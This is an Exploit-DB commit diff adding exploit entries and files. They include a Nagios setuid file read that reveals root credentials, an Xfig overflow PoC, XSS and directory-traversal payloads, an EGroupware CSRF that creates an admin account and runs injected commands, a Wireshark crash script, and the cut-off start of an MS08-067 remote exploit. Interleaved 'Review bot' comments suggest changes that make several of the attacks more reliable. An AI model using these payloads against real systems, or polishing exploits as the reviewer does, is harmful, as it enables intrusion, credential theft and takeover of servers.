Updated 05_18_2014

This commit is contained in:
Offensive Security 2014-05-18 04:35:34 +00:00
parent f648ecf6bd
commit a1eaa87beb
14 changed files with 766 additions and 267 deletions


@ -6661,7 +6661,7 @@ id,file,description,date,author,platform,type,port
7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload Vulnerability",2008-11-12,ZoRLu,php,webapps,0
7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0
7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0
7104,platforms/windows/remote/7104.c,"MS Windows Server Service Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135
7104,platforms/windows/remote/7104.c,"MS Windows Server Service - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135
7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) Remote SQL Injection Vulnerability",2008-11-12,"Hussin X",php,webapps,0
7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass Vulnerability",2008-11-12,G4N0K,php,webapps,0
7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0
@ -7983,7 +7983,7 @@ id,file,description,date,author,platform,type,port
8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
8479,platforms/windows/dos/8479.html,"MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@ -30095,3 +30095,15 @@ id,file,description,date,author,platform,type,port
33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x Cross-site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0
33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability",2009-11-30,s4r4d0,php,webapps,0
33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS 'categoryid' Parameter Cross Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0
33383,platforms/php/webapps/33383.txt,"Elxis 'filename' Parameter Directory Traversal Vulnerability",2009-11-30,"cr4wl3r ",php,webapps,0
33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - DoS PoC",2014-05-16,"Osanda Malith",windows,dos,0
33385,platforms/php/webapps/33385.txt,"phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0
33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference Vulnerability",2014-05-16,Mr.XHat,multiple,dos,0
33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins <= 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 '.fig' File Buffer Overflow Vulnerability",2009-12-03,pedamachephepto,linux,remote,0
33389,platforms/php/webapps/33389.txt,"EGroupware 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80
33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 404 Error Page Cross Site Scripting Vulnerability",2009-12-04,intern0t,php,webapps,0
33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x 'search.php' Cross Site Scripting Vulnerability",2009-12-07,"aBo MoHaMeD",php,webapps,0
33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0


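--- a/platforms/linux/local/33387.txt
+++ b/platforms/linux/local/33387.txt
@@ -0,0 +1,189 @@
+=============================================
+- Release date: 15.05.2014
+- Discovered by: Dawid Golunski
+- Severity: Moderate
+=============================================
+I. VULNERABILITY
+-------------------------
+check_dhcp - Nagios Plugins <= 2.0.1 Arbitrary Option File Read
+II. BACKGROUND
+-------------------------
+"Nagios is an open source computer system monitoring, network monitoring and
+infrastructure monitoring software application. Nagios offers monitoring and
+alerting services for servers, switches, applications, and services.
+It alerts the users when things go wrong and alerts them a second time when
+the problem has been resolved.
+Nagios Plugins (Official)
+The Nagios Plugins Development Team maintains a bundle of more than fifty
+standard plugins for Nagios and other monitoring applications that use the
+straightforward plugin interface originally invented by the Nagios folks.
+Each plugin is a stand-alone command line tool that provides a specific type
+of check. Typically, your monitoring software runs these plugins to determine
+the current status of hosts and services on your network.
+Some of the provided plugins let you check local system metrics (such as load
+averages, processes, or disk space usage), others use various network protocols
+(such as ICMP, SNMP, or HTTP) to perform remote checks.
+This allows for checking a large number of common host and service types.
+* check_dhcp plugin
+This plugin tests the availability of DHCP servers on a network."
+III. INTRODUCTION
+-------------------------
+check_dhcp plugin that is a part of the official Nagios Plugins package contains
+a vulnerability that allows a malicious attacker to read parts of INI
+config files belonging to root on a local system. It could allow an attacker
+to obtain sensitive information like passwords that should only be accessible
+by root user.
+The vulnerability is due to check_dhcp plugin having Root SUID permissions and
+inappropriate access control when reading user provided config file.
+IV. DESCRIPTION
+-------------------------
+check_dhcp requires a root SUID permission on the program binary file in order to run
+correctly. Default installation of check_dhcp when installed from sources assigns
+the setuid bit automatically on the file:
+# ./configure ; make ; make install
+# ls -l /usr/local/nagios/libexec/check_dhcp
+-r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp
+As we can see in the provided help the plugin allows for reading options from a
+supplied config file by using --extra-opts option:
+# /usr/local/nagios/libexec/check_dhcp --help
+check_dhcp v2.0.1 (nagios-plugins 2.0.1)
+...
+Usage:
+check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
+[-i interface] [-m mac]
+Options:
+...
+--extra-opts=[section][@file]
+Read options from an ini file. See
+https://www.nagios-plugins.org/doc/extra-opts.html
+for usage and examples.
+The option could be used to read parts of any INI format config files
+available on the system. Because check_dhcp is running as root (thanks
+to SETUID bit) and does not drop the root privileges when accessing the
+config file nor does it check if a given file should be accessible by the
+user executing it any root ini-config file can be accessed this way by an
+unprivileged user on the local system.
+Ironically, the extra-opts.html document states
+"The initial use case for this functionality is for hiding passwords, so
+you do not have to define sensitive credentials in the Nagios configuration
+and these options won't appear in the command line."
+V. PROOF OF CONCEPT
+-------------------------
+A good example of a program that stores configuration in INI format is MySQL.
+Administrators often save mysql credentials in /root/.my.cnf to avoid having
+to type them each time when running a mysql client. Storing mysql passwords in
+a config file is also suggested for safety in MySQL docs :
+http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html
+An example mysql config file could look like this:
+# cat /root/.my.cnf
+[mysqldump]
+quick
+[mysql]
+# saved password for the mysql root user
+password=myRootSecretMysqlPass123
+If an unprivileged attacker had access to a system containing SUID binary of
+check_dhcp plugin he could easily use it to retrieve the password contained
+in /root/.my.cnf file:
+[attacker@localhost ~]$ id
+uid=500(attacker) gid=500(attacker) groups=500(attacker)
+[attacker@localhost ~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=mysql@/root/.my.cnf
+/usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=myRootSecretMysqlPass123'
+Usage:
+check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
+[-i interface] [-m mac]
+As we can see the contents of the 'mysql' section of /root/.my.cnf option
+file gets printed as a part of the error message revealing its contents to
+the attacker.
+VI. BUSINESS IMPACT
+-------------------------
+Malicious user that has local access to a system where check_dhcp plugin is
+installed with SUID could exploit this vulnerability to read any INI format
+config files owned by root and potentially extract some sensitive information.
+VII. SYSTEMS AFFECTED
+-------------------------
+Systems with check_dhcp SUID binary installed as a part of Nagios Plugins 2.0.1 or older
+are vulnerable.
+VIII. SOLUTION
+-------------------------
+Remove SETUID permission bit from the check_dhcp binary file if the plugin is not used.
+Vendor has been informed about the vulnerability prior to release of this advisory.
+Install a newer version of the plugin when released by vendor.
+IX. REFERENCES
+-------------------------
+http://exchange.nagios.org/directory/Plugins/*-Plugin-Packages/Nagios-Plugins-%28Official%29/details
+http://www.nagios-plugins.org/download/nagios-plugins-2.0.1.tar.gz
+https://nagios-plugins.org/doc/extra-opts.html
+http://en.wikipedia.org/wiki/Setuid
+http://en.wikipedia.org/wiki/INI_file
+http://dev.mysql.com/doc/refman/5.7/en/password-security-user.html
+http://legalhackers.com/advisories/nagios-check_dhcp.txt
+X. CREDITS
+-------------------------
+The vulnerability has been discovered by Dawid Golunski
+dawid (at) legalhackers (dot) com
+legalhackers.com
+XI. REVISION HISTORY
+-------------------------
+May 12th, 2014: Advisory created
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise. I accept no
+responsibility for any damage caused by the use or misuse of this information.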
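Review bot: Section VIII offers only one interim mitigation, removing the setuid bit "if the plugin is not used", which leaves sites that do need check_dhcp (section IV states it must run as root) with nothing to do until a fixed release ships. The practical hardening for those sites is to restrict who may execute the binary rather than strip the bit, e.g. `chown root:nagios /usr/local/nagios/libexec/check_dhcp; chmod 4750 /usr/local/nagios/libexec/check_dhcp`, so an arbitrary local user never reaches the --extra-opts code path. It would also help readers to spell out that two distinct defects are involved: the file is opened with effective uid 0 without checking the invoking user's access to it (a privilege drop, or an access check against the real uid, before parsing --extra-opts), and the usage error shown in section V echoes the unrecognized option's value back, which is the channel that actually leaks the password — a plugin that still prints option values would leak through any other readable-but-secret path. The advisory does not name the fixed version; readers should check the nagios-plugins changelog rather than assume one.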

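--- a/platforms/linux/remote/33388.f
+++ b/platforms/linux/remote/33388.f
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/37193/info
+Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input.
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+Xfig and Transfig 3.2.5 are vulnerable; other versions may also be affected.
+PROGRAM XFIG_POC
+CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
+C
+C XFIG <= 3.2.5B BUFFER OVERFLOW
+C TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
+C WWW.XFIG.ORG
+C
+C AUTHORS:
+C * PEDAMACHEPHEPTOLIONES <pedamachepheptoliones@gmail.com>
+C * D.B. COOPER
+C
+C PROBLEM:
+C A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
+C WHEN READING MALFORMED .FIG FILES
+C EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
+C
+C TEST:
+C xfig plane.fig
+C fig2dev -L png plane.fig
+C (IT DOESN'T HAVE TO BE "PNG")
+C
+C SOLUTION:
+C DON'T TAKE .FIG CANDY FROM STRANGERS
+C
+C OLDSKOOL FORTRAN POCS FTW
+C
+CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
+INTEGER I
+CHARACTER(LEN=167) :: STR
+DO 10 I=1,167
+STR(I:I)='Z'
+10 CONTINUE
+OPEN(11,FILE='plane.fig')
+WRITE(11,*) '0 1 2 3'
+WRITE(11,*) '4'
+WRITE(11,*) '1 2 3 4 5 6 7 '//STR
+CLOSE(11)
+WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'
+END PROGRAM XFIG_POC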
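Review bot: The three `WRITE(11,*)` statements use list-directed output, which prepends a blank to every record and, on some compilers, wraps long records at a default line width — the 167-byte record written by `WRITE(11,*) '1 2 3 4 5 6 7 '//STR` may therefore be split across two lines and never reach the length the overflow needs; an explicit format, `WRITE(11,'(A)') '1 2 3 4 5 6 7 '//STR`, on all three writes makes the file contain exactly the intended bytes. The `DO 10` fill loop can be replaced by `STR = REPEAT('Z', 167)`, and the header comment should say why 167 was chosen (presumably the distance from the text buffer to the saved return address, which the comment block asserts is overwritten but does not quantify). `OPEN` is never checked with `IOSTAT=`, which is minor for a PoC but leaves a silent failure if the directory is not writable.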


@ -0,0 +1,42 @@
<html>
<title>Mozilla Firefox Null Pointer Dereference Vulnerability</title>
<pre>
Fun side of life!
<br>
Details:
Title: Mozilla Firefox Null Pointer Dereference Vulnerability
Version: Prior to 29.0
Date: 4/30/2014
Discovered By: Mr.XHat
E-Mail: Mr.XHat {AT} GMail.com
Tested On: Windows 7 x64 EN
###################################
Disassembly:
01694240 8bc2 mov eax,edx
01694242 d9e0 fchs
01694244 8b550c mov edx,dword ptr [ebp+0Ch]
01694247 d95c2418 fstp dword ptr [esp+18h]
0169424b 8b1a mov ebx,dword ptr [edx] ds:0023:00000000=????????
0169424d d9442418 fld dword ptr [esp+18h]
01694251 8d4c2420 lea ecx,[esp+20h]
01694255 d9c0 fld st(0)
01694257 51 push ecx
============================================
Output:
(e0.544): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07e1fd00 ebx=0994bf90 ecx=000001f8 edx=00000000 esi=000000a8 edi=00000000
eip=0169424b esp=0012c8f0 ebp=0012c940 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll -
xul!NS_NewLocalFile+0x2a49c:
0169424b 8b1a mov ebx,dword ptr [edx] ds:0023:00000000=????????
#######################################################################################
</pre>
<a href="javascript:_Launch_Website_In_Floating_Window_()"
onclick="window.open('about:blank','1','toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=9999999999,height=9999999999');"
>Crash_Me</a>
<br><br>
I kill you again!
</html>
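Review bot: The anchor's `href="javascript:_Launch_Website_In_Floating_Window_()"` names a function that is defined nowhere in the page, so after the onclick handler returns the browser also evaluates the href and raises a ReferenceError; the `window.open` in onclick is the entire trigger, so use `href="#"` and end the handler with `return false;` (or put the window.open in the href) so the PoC has one well-defined action. The header's `Version: Prior to 29.0` also disagrees with this commit's index entry, which lists the PoC as `Mozilla Firefox 29.0`; a null dereference (edx=0 at the faulting `mov ebx,dword ptr [edx]`) in the current release is a different claim from one in older releases, and the two should match. The page has no `<head>`/`<body>` structure, which is harmless for the crash but cheap to fix.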


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37158/info
Elxis is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/includes/feedcreator.class.php?filename=../../../../../../etc/passwd

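--- a/platforms/php/webapps/33385.txt
+++ b/platforms/php/webapps/33385.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/37180/info
+phpMyFAQ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+Versions prior to phpMyFAQ 2.5.5 are vulnerable.
+http://www.example.com/index.php?action=sitemap&lang=en"><script>alert(1)</script>
+http://www.example.com/index.php?search=hello"><script>alert(document.cookie)</script>&action=search
+http://www.example.com/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script>
+http://www.example.com/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script>
+http://www.example.com/index.php?action=sitemap&letter=W&lang=en"><script>alert(1)</script>
+http://www.example.com/index.php?action=sitemap&letter=W"><script>alert(1)</script>&lang=en
+http://www.example.com/index.php?sid=7&lang=en"><script>alert(document.cookie)</script>&action=show&cat=1
+http://www.example.com/index.php?sid=7&lang=en&action=show&cat=1"><script>alert(document.cookie)</script>
+http://www.example.com/index.php?action=search&tagging_id=1"><script>alert(1)</script>
+http://www.example.com/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script>
+http://www.example.com/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script>
+http://www.example.com/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en
+http://www.example.com/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en
+http://www.example.com/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script>
+http://www.example.com/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en
+http://www.example.com/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en
+http://www.example.com/index.php?action=add&question=1&cat=1"><script>alert(1)</script>
+http://www.example.com/index.php?action=add&question=1"><script>alert(1)</script>&cat=1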

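--- a/platforms/php/webapps/33389.txt
+++ b/platforms/php/webapps/33389.txt
@@ -0,0 +1,93 @@
+Advisory ID: HTB23212
+Product: EGroupware
+Vendor: http://www.egroupware.org/
+Vulnerable Version(s): 1.8.006 community edition and probably prior
+Tested Version: 1.8.006 community edition
+Advisory Publication: April 23, 2014 [without technical details]
+Vendor Notification: April 23, 2014
+Vendor Patch: May 6, 2014
+Public Disclosure: May 14, 2014
+Vulnerability Type: Cross-Site Request Forgery [CWE-352], Code Injection [CWE-94]
+CVE References: CVE-2014-2987, CVE-2014-2988
+Risk Level: High
+CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+-----------------------------------------------------------------------------------------------
+Advisory Details:
+High-Tech Bridge Security Research Lab discovered CSRF and Remote Code Execution vulnerabilities in EGroupware, which can be exploited by remote attacker to gain full control over the application and compromise vulnerable system.
+1) ?ross-Site Request Forgery (CSRF) in EGroupware: CVE-2014-2987
+The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can create a new user account with administrative privileges by tricking logged-in Groupware administrator to visit a malicious pages with CSRF exploit.
+Simple CSRF exploit below creates new administrator with login "immuniweb" and password "immuniweb":
+<form action="http://[host]/index.php?menuaction=admin.uiaccounts.add_user" method="post" name="main">
+<input type="hidden" name="account_lid" value="immuniweb">
+<input type="hidden" name="account_status" value="A">
+<input type="hidden" name="account_firstname" value="firstname">
+<input type="hidden" name="account_lastname" value="lastname">
+<input type="hidden" name="account_passwd" value="immuniweb">
+<input type="hidden" name="account_passwd_2" value="immuniweb">
+<input type="hidden" name="changepassword" value="1">
+<input type="hidden" name="expires" value="2014/04/29">
+<input type="hidden" name="never_expires" value="True">
+<input type="hidden" name="account_email" value="immuniweb@immuniweb.com">
+<input type="hidden" name="account_groups[]" value="-2">
+<input type="hidden" name="account_primary_group" value="-2">
+<input type="hidden" name="submit" value="Add">
+<input type="submit" id="btn">
+</form>
+2) Code Injection in EGroupware: CVE-2014-2988
+The vulnerability exists due to insufficient sanitisation of input data passed via the HTTP POST "newsettings" parameter to PHP function "call_user_func()". A remote attacker with administrative privileges can inject and execute arbitrary PHP code on the target system with privileges of the webserver.
+This vulnerability can be exploited in pair with the above-described CSRF vulnerability.
+The following exploitation example writes "immuniweb" word into file "/1.php":
+<form action="http://[host]/index.php?menuaction=admin.uiconfig.index&appname=phpbrain" method="post" name="main">
+<input type="hidden" name="newsettings[system]" value="echo immuniweb>1.php">
+<input type="hidden" name="submit" value="Save">
+<input type="submit" id="btn">
+</form>
+-----------------------------------------------------------------------------------------------
+Solution:
+Update to EGroupware version 1.8.007
+More Information:
+http://www.egroupware.org/forum#nabble-td3997580
+http://www.egroupware.org/changelog
+-----------------------------------------------------------------------------------------------
+References:
+[1] High-Tech Bridge Advisory HTB23212 - https://www.htbridge.com/advisory/HTB23212 - CSRF and Remote Code Execution in EGroupware.
+[2] EGroupware - http://www.egroupware.org/ - EGroupware is the leading open source collaboration tool and the top choice for big enterprises, SMEs and teams within and across organizations all over the globe.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+-----------------------------------------------------------------------------------------------
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.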
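Review bot: Both PoC forms end in `<input type="submit" id="btn">` with no auto-submit, so as written the CSRF page still needs the administrator to click something, which does not demonstrate the claim in (1) that merely visiting a malicious page suffices; a `<script>document.main.submit();</script>` after each form closes that gap. In (2) the PoC sends `newsettings[system]` as the parameter name and the shell command as its value, but the text only says the parameter reaches `call_user_func()`; one sentence stating which part becomes the callable and which the argument (presumably the key and the value respectively — confirm against the patched code) would make the vector clear to readers. The hard-coded `expires` value `2014/04/29` was already in the past at disclosure; with `never_expires=True` it is presumably ignored, but that should be said, or the field dropped.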

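--- a/platforms/php/webapps/33390.txt
+++ b/platforms/php/webapps/33390.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37209/info
+Yoast Google Analytics for WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+This issue affects version 3.2.4 of the plugin.
+http://www.example.com/wp/?s=</script><script>alert(0)</script>
+http://www.example.com/wp/?s=");alert(0);document.write("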


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37233/info
YABSoft Advanced Image Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Advanced Image Hosting Script 2.2 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?text=%3Cscript%3Ealert(document.cookie)%3C/script%3E&dosearch=Search


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37239/info
The Warp5 component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(12346)%3B%3C/ScRiPt%3E
http://www.example.com/index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00&#039;%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E
The GET variable yt_color can be set to "+onmouseover=alert(123456)+


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37260/info
The Joomla! You!Hostit! template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
You!Hostit! template 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/path/?created_by_alias=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E&title=111-222-1933andresg888@gmail.com&text=111-222-1933andresg888@gmail.com&Submit=Submit

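--- a/platforms/php/webapps/33394.txt
+++ b/platforms/php/webapps/33394.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37263/info
+Invision Power Board is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+Invision Power Board 2.0 through 3.0.4 are vulnerable. Other versions may also be affected.
+<span onmouseover="javascript:alert('XSS');function
+fakeLoginPage(){...}">move your mouse pointer here</span>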

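--- a/platforms/windows/dos/33384.py
+++ b/platforms/windows/dos/33384.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python
+# Exploit Title: Wireshark Read Access Violation near NULL starting at libcairo_2!cairo_image_surface_get_data()
+# Date: May 15th 2014
+# Author: Osanda Malith Jayathissa
+# E-Mail: osandajayathissa<[at]>gmail.com
+# Version: 1.10.7 32-bit and 64-bit
+# Vendor Homepage: http://www.wireshark.org
+# Tested on: Windows 8 64-bit
+'''
+The issue is with the cairo_image_surface_get_data() function in Cairo.
+These fields are vulnerable:
+- Filter text box
+- Statistics -> IP DESTINATIONS
+- Statistics -> IP Addresses
+Paste the generated text in any one of above fields and hit return.
+'''
+payload = "A" * 50000
+file = open('exploit.txt', "w")
+file.write(payload)
+file.close()
+'''
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Wireshark32\libcairo-2.dll -
+eax=00000000 ebx=052dabf0 ecx=77bc2ad2 edx=612fc6e0 esi=00000000 edi=612fc6e0
+eip=61291737 esp=008cdca0 ebp=00000000 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
+libcairo_2!cairo_image_surface_get_data+0x7:
+61291737 8138609d2f61 cmp dword ptr [eax],offset libcairo_2!cairo_tee_surface_index+0xd080 (612f9d60) ds:002b:00000000=????????
+'''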
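Review bot: `file = open('exploit.txt', "w")` shadows the Python 2 builtin `file` and relies on a manual `close()`; the idiomatic form also guarantees the close if the write raises: `with open('exploit.txt', 'w') as out:` / `    out.write(payload)`. The length 50000 in `payload = "A" * 50000` is unexplained — a one-line comment saying whether it is an empirically found minimum or just "large enough" would help, since the register dump only shows a read through a NULL surface pointer (eax=0 at the faulting `cmp`) and not why that length produces it (presumably a failed or oversized surface allocation — confirm). The dump and the title describe a NULL-pointer read, which supports the index classifying this as DoS rather than code execution; stating that explicitly in the docstring would save readers from over-reading "Access Violation".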


@ -1,265 +1,265 @@
/*
MS08-067 Remote Stack Overflow Vulnerability Exploit
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28
*/
#include "stdafx.h"
#include <winsock2.h>
#include <Rpc.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")
struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};
struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};
BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"
"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
"\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
